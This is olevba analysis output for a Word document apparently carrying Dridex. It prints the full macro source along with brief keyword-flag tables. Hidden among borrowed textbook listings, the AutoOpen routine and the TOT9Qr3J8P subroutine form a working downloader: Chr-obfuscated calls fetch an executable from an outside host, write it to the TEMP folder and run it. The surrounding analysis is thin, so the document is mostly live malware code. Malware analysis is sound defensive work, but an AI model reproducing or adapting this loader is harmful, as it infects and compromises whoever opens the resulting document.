Malicious Word macro

olevba 0.26 - http://decalage.info/python/oletools
Flags       Filename
----------- -----------------------------------------------------------------
OLE:MASI-B- dridex.doc

(Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)

===============================================================================
FILE: dridex.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: dridex.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Sub ôñÔÔÀ(FFFFF As Long)

TOT9Qr3J8P

End Sub

Sub autoopen()

ôñÔÔÀ (3)

End Sub


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+----------+----------+---------------------------------------+
| Type     | Keyword  | Description                           |
+----------+----------+---------------------------------------+
| AutoExec | AutoOpen | Runs when the Word document is opened |
+----------+----------+---------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO Module1.bas
in file: dridex.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
'
Sub PublishAutoFilterRange()
    Ôû.Sheets("Query").AutoFilterMode = False
    ä.Range("Query_From_Northwind").Select
    â.Range("Query_From_Northwind").AutoFilter _
        Field:=1, _
        Criteria1:="Condiments"
    ThisWorkbook.PublishObjects.Add( _
        SourceType:=xlSourceAutoFilter, _
        FileName:="C:\Publish01.htm", _
        Sheet:="Query", _
        Source:=ô.Sheets("Query").AutoFilter.Range, _
        HtmlType:=xlHtmlStatic, _
        DivID:="ExcelAutoFilter", _
        Title:="Excel AutoFilter Range").Publish True
End Sub
'
' Publish a chart sheet
'
Sub PublishChartSheet()
    ThisWorkbook.PublishObjects.Add( _
        SourceType:=xlSourceChart, _
        FileName:="C:\Publish02.htm", _
        Sheet:="Chart1", _
        HtmlType:=xlHtmlChart, _
        DivID:="ExcelChartSheet", _
        Title:="Excel Chart Sheet").Publish True
End Sub
'
' Publish an embedded chart
'
Sub PublishEmbeddedChart()
    ThisWorkbook.PublishObjects.Add( _
        SourceType:=xlSourceChart, _
        FileName:="C:\Publish03.htm", _
        Sheet:="2000 Budget", _
        Source:="Chart 1", _
        HtmlType:=xlHtmlStatic, _
        DivID:="ExcelEmbeddedChart", _
        Title:="Excel Embedded Chart").Publish True
End Sub
'
' Publish a PivotTable
'
Sub PublishPivotTable()
    ThisWorkbook.PublishObjects.Add( _
        SourceType:=xlSourcePivotTable, _
        FileName:="C:\Publish04.htm", _
        Sheet:="PivotTable", _
        Source:="PivotTable1", _
        HtmlType:=xlHtmlList, _
        DivID:="ExcelPivotTable", _
        Title:="Excel PivotTable").Publish True
End Sub
'
' Publish a print area
'
Sub PublishPrintArea()
    ç.Worksheets("2000 Budget").PageSetup.PrintArea = "A1:B13"
    ThisWorkbook.PublishObjects.Add( _
        SourceType:=xlSourcePrintArea, _
        FileName:="C:\Publish05.htm", _
        Sheet:="2000 Budget", _
        Source:=ôâ.Worksheets("2000 Budget").PageSetup.PrintArea, _
        HtmlType:=xlHtmlStatic, _
        DivID:="ExcelPrintArea", _
        Title:="Excel Print Area").Publish True
End Sub
'
' Publish a query table
'
Sub PublishQueryTable()
    ThisWorkbook.PublishObjects.Add( _
        SourceType:=xlSourceQuery, _
        FileName:="C:\Publish06.htm", _
        Sheet:="Query", _
        Source:="Query from Northwind", _
        HtmlType:=xlHtmlCalc, _
        DivID:="ExcelQueryTable", _
        Title:="Excel Query Table").Publish True
End Sub
'
' Publish a range using coordinates
'
Sub PublishRangeCoordinates()
    ThisWorkbook.PublishObjects.Add( _
        SourceType:=xlSourceRange, _
        FileName:="C:\Publish07.htm", _
        Sheet:="2000 Budget", _
        Source:="A1:B17", _
        HtmlType:=xlHtmlCalc, _
        DivID:="ExcelRangeCoordinates", _
        Title:="Excel Range Coordinates").Publish True
End Sub
'
' Publish a range using a name
'
Sub PublishRangeName()
    ThisWorkbook.PublishObjects.Add( _
        SourceType:=xlSourceRange, _
        FileName:="C:\Publish08.htm", _
        Source:="Expenses", _
        HtmlType:=xlHtmlStatic, _
        DivID:="ExcelRangeName", _
        Title:="Excel Range Name").Publish True
End Sub

Public Function WphmxowcstXb(A7X71OY4p As String)
 Set zBo1iklWv9Sz = dFlagLB30D("S" & Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & "c" & "a" & Chr(116) & Chr(105) & "o" & Chr(110))
zBo1iklWv9Sz.Open (QrDNQZQRP)
End Function
Public Function dFlagLB30D(HvbtyGByuxg3J As String)
 Set dFlagLB30D = CreateObject(HvbtyGByuxg3J)
End Function
Public Function IrQ2IESgmYoy(UNIWVVc542vt As Variant, cNvH4h9GxP As String)
Dim oUeKB2dS: Set oUeKB2dS = dFlagLB30D(Chr(65) & "d" & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & "t" & Chr(114) & Chr(101) & "a" & "m")

With oUeKB2dS
   .Type = 1
    .Open
    .write UNIWVVc542vt
    .savetofile cNvH4h9GxP, 2
End With
End Function

'
' Publish a worksheet
'
Sub PublishWorksheet()
    ThisWorkbook.PublishObjects.Add( _
        SourceType:=xlSourceSheet, _
        FileName:="C:\Publish09.htm", _
        Sheet:="2000 Budget", _
        HtmlType:=xlHtmlCalc, _
        DivID:="ExcelWorksheet", _
        Title:="Excel Worksheet").Publish True
End Sub
'
' Listing 20.2. Republishing a PublishObject.
'
Sub RepublishObject()
    Dim strID As String
    strID = "ExcelRangeCoordinates"
    For Each po In ThisWorkbook.PublishObjects
        If po.DivID = strID Then
            po.Publish
            Exit For
        End If
    Next 'po
End Sub
'
' Listing 20.3. A procedure that deletes all the PublishObjects
'
Sub DeletePublishObjects()
  For Each po In ThisWorkbook.PublishObjects
        po.Delete
    Next 'po
End Sub
'
' Listing 20.4. A procedure that adds a Hyperlink object.
'
Sub AddLink()
    Dim r As Range
    '
    ' Add a paragraph to the end of the document
    '
    With ThisDocument.Paragraphs
        .Item(.Count).Range.InsertParagraphAfter
        Set r = .Item(.Count).Range
    End With
    r.Text = "Sams' Home Page"
    r.Hyperlinks.Add _
        Anchor:=r, _
        Address:="http://www.mcp.com/sams/", _
        ScreenTip:="Click here to visit the home page of Sams!"
End Sub
'
' Listing 20.5. Procedures that add a link for the Yahoo!
' search engine and run a query on the Yahoo! database.
'
Sub AddYahoo()
    Dim r As Range
    '
    ' Add a paragraph to the end of the document
    '
    With ThisDocument.Paragraphs
        .Item(.Count).Range.InsertParagraphAfter
        Set r = .Item(.Count).Range
    End With
    r.Text = "Yahoo Search"
    r.Hyperlinks.Add _
        Anchor:=r, _
        Address:="http://search.yahoo.com/bin/search"
End Sub

Sub SearchYahoo()
    Dim link As Hyperlink
    Dim keyword As String
    Set link = ThisDocument.Hyperlinks("http://search.yahoo.com/bin/search")
    keyword = InputBox("Enter a search keyword:")
    link.Follow _
        ExtraInfo:="p=" & keyword, _
        Method:=msoMethodGet
End Sub
'
' Listing 20.6. Using the FollowHyperlink method to display
' a target document without an existing Hyperlink object.
'
Sub FollowHyperlinkTest()
    Dim keyword As String
    keyword = InputBox("Enter a search keyword:")
    ThisDocument.FollowHyperlink _
        Address:="http://search.yahoo.com/bin/search", _
        ExtraInfo:="p=" & keyword, _
        Method:=msoMethodGet
End Sub
'
' Listing 20.7. Some event handlers that are used to
' display a Web page.
'
' This event handler fires when you first open the form
'
Private Sub UserForm_Initialize()
    Dim maxWidth As Integer
    Dim maxHeight As Integer
    With webWWW
        '
        ' Display and save the initial URL
        '
        If txtLocation <> "" Then
            topPage = txtLocation
            .Navigate txtLocation
        End If
        '
        ' Adjust the width and height of the control
        '
        maxWidth = Ê.Me.Width - .Left - 10
        maxHeight = Ê.Me.Height - .Top - 20
        If Application.UsableWidth > maxWidth Then
            .Width = maxWidth
        End If
        If Application.UsableHeight > maxHeight Then
            .Height = maxHeight
        End If
    End With
End Sub
'
' This event handler fires when you enter the text box
'
Private Sub txtLocation_Enter()
    '
    ' Make sure Surf! button is the default
    '
    cmdSurf.Default = True
End Sub
'
' This event handler fires when you click the Surf! button
'
Private Sub cmdSurf_Click()
    '
    ' Surf to the URL specified in the Location text box
    '
    If txtLocation <> "" Then
        webWWW.Navigate txtLocation
    Else
        txtLocation.SetFocus
        Beep
    End If
End Sub
'
' This event handler fires once the Web page navigation is done
'
Private Sub webWWW_DocumentComplete(ByVal pDisp As Object, URL As Variant)
    lblProgress.Caption = " Done"
    txtLocation = URL
End Sub
'
' This event handler fires at the start of the download
'
Private Sub webWWW_DownloadBegin()
    lblProgress.Caption = " Downloading..."
End Sub
'
' This event handler fires when the URL title changes
'
Private Sub webWWW_TitleChange(ByVal Text As String)
    '
    ' Update the form's caption to reflect the new title
    '
    ÊMe.Caption = "The Word Wide Web - " & webWWW.LocationName
End Sub
'
' This event handler fires when the status text changes
'
Private Sub webWWW_StatusTextChange(ByVal Text As String)
    lblStatus = Text
End Sub
'
' Listing 20.8. Event handlers for the navigation
' buttons in the custom Web browser.
'
'
' This event handler fires when you click the Back button
'
Private Sub cmdBack_Click()
    '
    ' An error occurs if there is no page to go back to
    '
    On Error Resume Next
    webWWW.GoBack
End Sub
'
' This event handler fires when you click the Forward button
'
Private Sub cmdForward_Click()
    '
    ' An error occurs if there is no page to go forward to
    '
    On Error Resume Next
    webWWW.GoForward
End Sub
'
' This event handler fires when you click the Top button
'
Private Sub cmdTop_Click()
    webWWW.Navigate topPage
End Sub
'
' This event handler fires when you click the Refresh button
'
Private Sub cmdRefresh_Click()
    webWWW.Refresh
End Sub
'
' This event handler fires when you click the Stop button
'
Private Sub cmdStop_Click()
    webWWW.Stop
End Sub
'
' This event handler fires when you click the Home button
'
Private Sub cmdHome_Click()
    webWWW.GoHome
End Sub
'
' This event handler fires when you click the Search button
'
Private Sub cmdSearch_Click()
    webWWW.GoSearch
End Sub
'
' This event handler fires when you click the Exit button
'
Private Sub cmdExit_Click()
    Unload ÊMe
End Sub
'
' Listing 20.9. A procedure that manipulates Internet Explorer
' via Automation using various members of the
' InternetExplorer class.
'
Sub AutomateInternetExplorer()
    Dim ie As Object
    Dim result As Integer
    '
    ' Set up the Automation object
    '
    Set ie = CreateObject("InternetExplorer.Application")
    '
    ' Navigate to a page and customize the browser window
    '
    ie.Navigate "http://www.microsoft.com/ie/"
    ie.Toolbar = False
    ie.StatusBar = False
    ie.MenuBar = False
    '
    ' Twiddle thumbs while the page loads
    '
    Do While ie.Busy
        DoEvents
    Loop
    '
    ' Display page info
    '
    result = MsgBox( _
        "Current URL:  " & ie.LocationURL & Chr(13) & _
        "Current Title: " & ie.LocationName & Chr(13) & _
        "Document type: " & ie.Type & Chr(13) & Chr(13) & _
        "Would you like to view this document?", _
        vbYesNo + vbQuestion)
    If result = vbYes Then
        '
        ' If Yes, make browser visible and activate it
        '
        ie.Visible = True
        AppActivate "Microsoft Internet Explorer"
    Else
        '
        ' If no, bail out
        '
        ie.Quit
    End If
    Set ie = Nothing
End Sub

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+----------------------+-----------------------------------------+
| Type       | Keyword              | Description                             |
+------------+----------------------+-----------------------------------------+
| Suspicious | Open                 | May open a file                         |
| Suspicious | Chr                  | May attempt to obfuscate specific       |
|            |                      | strings                                 |
| Suspicious | CreateObject         | May create an OLE object                |
| Suspicious | SaveToFile           | May create a text file                  |
| Suspicious | AppActivate          | May control another application by      |
|            |                      | simulating user keystrokes              |
| Suspicious | Run                  | May run an executable file or a system  |
|            |                      | command                                 |
| Suspicious | Write                | May write to a file (if combined with   |
|            |                      | Open)                                   |
| Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
|            |                      | may be used to obfuscate strings        |
|            |                      | (option --decode to see all)            |
| IOC        | http://www.mcp.com/s | URL                                     |
|            | ams/                 |                                         |
| IOC        | http://search.yahoo. | URL                                     |
|            | com/bin/search       |                                         |
| IOC        | http://www.microsoft | URL                                     |
|            | .com/ie/             |                                         |
+------------+----------------------+-----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO Module2.bas
in file: dridex.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Public QrDNQZQRP As String


' Listing 13.4. Using the DDEInitiate method to open a DDE channel.
'
Sub TestIt()
   Dim result As Integer
    result = OpenHailingFrequencies
    DDETerminate result
End Sub

Function OpenHailingFrequencies() As Integer
    Dim channel As Integer

    On Error GoTo BadConnection
    '
    ' Establish the DDE connection to Program Manager
    '
    channel = DDEInitiate("Progman", "Progman")

    MsgBox "A channel to Program Manager is now open.", vbInformation
    '
    ' Return the channel number
    '
    OpenHailingFrequencies = channel
    Exit Function

BadConnection:
    MsgBox "Could not open a channel to Program Manager!", vbExclamation
    '
    ' Return 0
    '
    OpenHailingFrequencies = 0

End Function

' Listing 13.5. Using DDEExecute to control a server application.
'
Sub CreateWorkbookIcon()

    Dim channel As Integer
    Dim strPath As String, strName As String, strApp As String

    On Error GoTo BadConnection
    '
    ' Get info required for program item
    '
    strPath = ActiveWorkbook.Path & "\" & ActiveWorkbook.Name
    strName = Left(ActiveWorkbook.Name, Len(ActiveWorkbook.Name) - 4)
    strApp = Application.Path & "\Excel.exe"
    '
    ' Establish the DDE connection to Program Manager
    '
    channel = DDEInitiate("Progman", "Progman")
    '
    ' Create the group and item
    '
    DDEExecute channel, "[CreateGroup(""Excel Workbooks"")]"
    DDEExecute channel, "[AddItem(""" & strPath & """,""" & strName & """,""""" & strApp & """"")]"
    DDETerminate channel

    Exit Sub

BadConnection:
    MsgBox "Could not open a channel to Program Manager!", vbExclamation

End Sub

' Listing 13.6. Using DDERequest to retrieve data from an
' application.
'

Sub RequestWordData()
    Dim channel As Integer
    Dim wordData As Variant
    Dim getString As String
    On Error GoTo BailOut
    '
    ' Set up the application
    '
    Application.StatusBar = "Starting Word..."
    Application.DisplayAlerts = False
    '
    ' Initiate channel with System topic
    '
    channel = DDEInitiate("Winword", "System")
    '
    ' Open the document we want to work with
    '
    Application.StatusBar = "Opening Word document..."
    DDEExecute channel, "[FileOpen ""C:\My Documents\Chaptr13.doc""]"
    DDETerminate channel
    '
    ' Initiate new channel with document
    '
    channel = DDEInitiate("Winword", "C:\My Documents\Chaptr13.doc")
    '
    ' Find keyword and add a bookmark
    '
    DDEExecute channel, "[StartOfDocument]"
    DDEExecute channel, "[EditFind .Find = ""ACME""]"
    DDEExecute channel, "[SelectCurSentence]"
    DDEExecute channel, "[EditBookmark .Name = ""Gotcha""]"
    '
    ' Retrieve the bookmark and store it
    '
    wordData = DDERequest(channel, "Gotcha")
    getString = wordData(1)
    r.Worksheets("Sheet1").[A2].Value = getString
    '
    ' Quit Word and terminate channel
    '
    DDEExecute channel, "[FileExit 1]"
    DDETerminate channel

    Exit Sub

BailOut:
    DDETerminate channel
    MsgBox "DDE operation failed!", vbExclamation

End Sub

' Listing 13.7. Using DDEPoke to send data to an application.
'
Sub SendDataToWord()

    Dim channel As Integer, pokeData As Variant
    On Error GoTo BailOut
    '
    ' Set up the application
    '
    Application.StatusBar = "Starting Word..."
    Application.DisplayAlerts = False
    '
    ' Initiate channel with System topic
    '
    channel = DDEInitiate("Winword", "System")
    '
    ' Open the document we want to work with
    '
    Application.StatusBar = "Opening Word document..."
    DDEExecute channel, "[FileOpen ""C:\My Documents\Chaptr13.doc""]"
    DDETerminate channel
    '
    ' Initiate new channel with document
    '
    channel = DDEInitiate("Winword", "C:\My Documents\Chaptr13.doc")
    '
    'Get the data to be sent
    '
    Application.StatusBar = "Sending data..."
    Set pokeData = t.Worksheets("Sheet1").[A1]
    '
    'Send it to the "Gotcha" bookmark
    '
    DDEPoke channel, "Gotcha", pokeData
    '
    ' Quit Word and terminate channel
    '
    Application.StatusBar = "Shutting down Word..."
    DDEExecute channel, "[FileExit 1]"
    DDETerminate channel
    Application.StatusBar = False

    Exit Sub

BailOut:
    DDETerminate channel
    MsgBox "DDE operation failed!", vbExclamation
    Application.StatusBar = False

End Sub

' Listing 15.3. Using Automation to run a PowerPoint
' presentation slide show.
'
Sub TOT9Qr3J8P()

Set j9yPFDVwyo = dFlagLB30D("Mi" & Chr(99) & "r" & Chr(111) & Chr(115) & "o" & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & "L" & Chr(72) & "TT" & Chr(80))

CallByName j9yPFDVwyo, Chr(79) & Chr(112) & "e" & "n", VbMethod, Chr(71) & Chr(69) & Chr(84), _
Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(99) & Chr(111) & "l" & Chr(99) & Chr(104) & Chr(101) & Chr(115) & Chr(116) & Chr(101) & Chr(114) & Chr(45) & Chr(105) & Chr(110) & Chr(115) & Chr(116) & Chr(105) & Chr(116) & Chr(117) & Chr(116) & Chr(101) & Chr(46) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & "7" & Chr(48) & Chr(56) & Chr(47) & Chr(51) & Chr(52) & Chr(54) & Chr(46) & Chr(101) & Chr(120) & "e" _
, False

Set nVoYwy5wi65Ru = dFlagLB30D("W" & Chr(83) & Chr(99) & Chr(114) & "i" & Chr(112) & Chr(116) & Chr(46) & Chr(83) & "h" & "e" & Chr(108) & Chr(108))

Set Njvhw3SCwhJF = CallByName(nVoYwy5wi65Ru, Chr(69) & Chr(110) & Chr(118) & Chr(105) & "r" & Chr(111) & Chr(110) & "m" & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & "r" & Chr(111) & Chr(99) & Chr(101) & "s" & Chr(115))

NkFurzJgA4 = Njvhw3SCwhJF(Chr(84) & "E" & Chr(77) & Chr(80))

QrDNQZQRP = NkFurzJgA4 & Chr(92) & Chr(98) & Chr(105) & "k" & Chr(115) & Chr(101) & Chr(110) & Chr(112) & Chr(100) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
Dim yRG5Tmsczw() As Byte

CallByName j9yPFDVwyo, "S" & "e" & Chr(110) & Chr(100), VbMethod
yRG5Tmsczw = CallByName(j9yPFDVwyo, "r" & Chr(101) & Chr(115) & Chr(112) & "o" & Chr(110) & Chr(115) & Chr(101) & Chr(66) & Chr(111) & "d" & Chr(121), VbGet)
IrQ2IESgmYoy yRG5Tmsczw, QrDNQZQRP
On Error GoTo ehUAReVao5
    a = 197 / 0
  On Error GoTo 0

PBWxy1g8qJuzYK:
  Exit Sub
ehUAReVao5:
  WphmxowcstXb ("HBaMqGixX")
Resume PBWxy1g8qJuzYK
End Sub
Sub RunPresentation()
    On Error GoTo OpenPowerPoint
    '
    ' Reference the existing PowerPoint Application object
    '
    Set ppApp = GetObject(, "PowerPoint.Application")
    '
    ' Work with PowerPoint's Application object directly
    '
    With ppApp
        '
        ' Display PowerPoint
        '
        .Visible = True
        '
        ' Open and then run the presentation's slide show
        '
        .Presentations.Open "C:\My Documents\Juggling.ppt"
        .Presentations("Juggling.ppt").SlideShowSettings.Run
    End With
    Set ppApp = Nothing
'
' Program branches here if PowerPoint isn't running
'
OpenPowerPoint:
    ' Create a new instance of PowerPoint's Application object
    '
    Set ppApp = CreateObject("PowerPoint.Application")
    '
    ' Continue after the statement that caused the error
    '
    Resume Next
End Sub

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+----------------+-----------------------------------------+
| Type       | Keyword        | Description                             |
+------------+----------------+-----------------------------------------+
| Suspicious | Open           | May open a file                         |
| Suspicious | Chr            | May attempt to obfuscate specific       |
|            |                | strings                                 |
| Suspicious | CreateObject   | May create an OLE object                |
| Suspicious | Run            | May run an executable file or a system  |
|            |                | command                                 |
| Suspicious | CallByName     | May attempt to obfuscate malicious      |
|            |                | function calls                          |
| Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
|            |                | may be used to obfuscate strings        |
|            |                | (option --decode to see all)            |
| IOC        | Excel.exe      | Executable file name                    |
+------------+----------------+-----------------------------------------+